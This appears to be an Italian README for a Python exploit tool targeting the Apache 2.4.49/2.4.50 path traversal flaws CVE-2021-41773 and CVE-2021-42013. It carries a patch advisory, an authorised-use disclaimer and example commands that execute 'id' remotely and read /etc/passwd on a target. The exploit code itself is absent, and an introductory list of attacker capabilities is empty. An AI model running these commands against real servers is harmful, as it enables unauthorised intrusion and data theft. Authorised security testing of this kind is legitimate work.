
Exploit Python per path traversal del server HTTP Apache (CVE-2021-41773 & CVE-2021-42013) che abilita LFI e RCE tramite CGI. Per test di sicurezza e ricerca autorizzati.
CVE-2021-41773 e CVE-2021-42013
Si tratta di vulnerabilità critiche di path traversal che interessano Apache HTTP Server 2.4.49 e 2.4.50.
Esse consentono agli attaccanti di:
Entrambe le vulnerabilità sono corrette in Apache 2.4.51.
Si raccomanda vivamente un aggiornamento immediato.
python3 exploit.py --url <TARGET> --port [PORT] (--rce --command "COMMAND" | --lfi --path "/path/to/file")
Esempi
python3 exploit.py --url http://192.168.1.10 --rce --command "id"

python3 exploit.py --url http://192.168.1.10 --lfi --path "/etc/passwd"

Questo script di exploit è destinato esclusivamente a test di sicurezza autorizzati, ricerca difensiva e scopi educativi.